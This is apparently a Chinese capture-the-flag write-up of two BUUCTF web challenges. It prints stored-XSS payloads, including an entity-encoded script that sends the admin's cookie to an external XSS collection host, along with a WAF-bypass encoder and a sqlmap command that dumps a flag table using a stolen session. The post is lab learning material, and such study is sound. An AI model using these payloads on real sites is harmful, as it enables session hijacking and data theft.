BUU XSS COURSE 1 & [CISCN2019 华东北赛区]Web2

XSS的题目没怎么做过,比赛基本上也没有(=_=),总结下今天做的两题

都是看赵总视频现学现做的,这里附上学习链接,大家记得白嫖hhh~

BUU XSS COURSE 1

题解

这题点进去就两个窗口,一个吐槽的,一个登陆。

但是没有注册页面所以没啥用,直接来吐槽

先尝试弹窗<script>alert(1)</script>,访问给的地址没有弹窗

换个标签试试<IMG SRC="javascript.:alert('XSS');">,访问发现显示了一个不存在的图片,存在xss漏洞。

靶机无法访问外网,用内网xss平台,注册一个账号,创建“我的项目”,模块全点上,以后也能用。

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F8sVXk7%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

把xss代码在“吐槽”提交以后,访问一下给的地址,回到XSS平台的项目内容就可以看到两个刚接收到的内容,其中有一个是管理员访问。

利用管理员的cookie,以及来访地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登录即可得到flag(用chrome的edit this cookie插件比较方便)

end。

[CISCN2019 华东北赛区]Web2

知识点

1、储存型 XSS 与过滤绕过

附上CSP的知识:http://www.ruanyifeng.com/blog/2016/09/csp.html

2、SQL 注入

题解

这题打开先是一个论坛界面,内容都是超链接,我们点击投稿发现要注册,那就先注册登录。

发现一个投稿页面,还有个反馈页面,根据上面那题的思路,这题的解法应该是先在投稿文章内插入XSS代码,然后通过反馈让管理员审阅文章,从而窃取管理员的cookie。

先尝试能不能弹窗,查看文章源代码发现''(''被转义成了"(",存在WAF。

上传的内容需要转码来绕过WAF,用HTML Markup

赵总的脚本

in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=xpqwIP&keepsession=0&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();"

output = ""

for c in in_str:
output += "&#" + str(ord(c)) print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

注意!!!id记得改成自己xss平台的,比如赵总脚本里的是xpqwIP,别搞错了

生成的payload提交以后复制url,然后进反馈

地址前面记得改成web

md5截断验证用python脚本爆破,百度上挺多的。

填上URL和验证码提交,我们去XSS平台看看

我们用扫描器扫一下网,发现了admin.php

用刚才获取的cookie登录admin.php,测试发现存在sql注入(hhh盗用赵总id)

用sqlmap跑一下,得到flag

sqlmap -u "http://6e5d7496-7b5f-4d94-b0e3-74ccf262a4d2.node3.buuoj.cn/admin.php?id=4" --cookie="PHPSESSID=8925446bf891203de8f1226880a9e296" -T flag --dump --flush-session --fresh-queries

做完啦~ 涨姿势orz

最新文章

  1. Quartz作业调度框架及时间表达式的含义和语法
  2. Windows内核 基本数据结构
  3. SQL总结(四)编辑类
  4. redhat linux 安装mysql5.6.27
  5. Swift游戏实战-跑酷熊猫 11 欢迎进入物理世界
  6. extjs gride 显示序号
  7. linux入门教程(三) Linux操作系统的安装
  8. (转)嵌入式学习准备---linux c 文件锁
  9. 【转】Optiplex 7010驱动下载链接(XP&amp;Windows7
  10. MapReduce程序开发之流量求和(八)
  11. hdu 3912 Turn Right
  12. 利用内容提供者插入sms(装B程序)
  13. 阿里云入坑指南&amp;&amp;nodejs 安装配置
  14. AC自动机相关Fail树和Trie图相关基础知识
  15. Java+selenium 如何下拉移动滚动条【实战】
  16. JdbcTemplate中向in语句传参
  17. prune研究记录(二)
  18. 我最喜欢的jQuery插件模板
  19. “我爱淘”第二冲刺阶段Scrum站立会议5
  20. ios开发之-继承的实现运用

热门文章

  1. oracle11gR2、client及plsql完整安装与配置
  2. Tornado WEB服务器框架 Epoll-- 【Mysql数据库】
  3. Android 控件使用教程(一)—— ListView 展示图片
  4. 【LeetCode】169. Majority Element 解题报告(Java & Python & C+)
  5. 【LeetCode】47. Permutations II 解题报告(Python & C++)
  6. 【剑指Offer】链表中环的入口结点 解题报告(Python)
  7. 【LeetCode】60. Permutation Sequence 解题报告(Python & C++)
  8. 【LeetCode】416. Partition Equal Subset Sum 解题报告(Python & C++)
  9. 使用VUE CLI3.0搭建项目vue2+scss+element简易版
  10. 【安卓】AndroidStudio使用本地gradle进行build的配置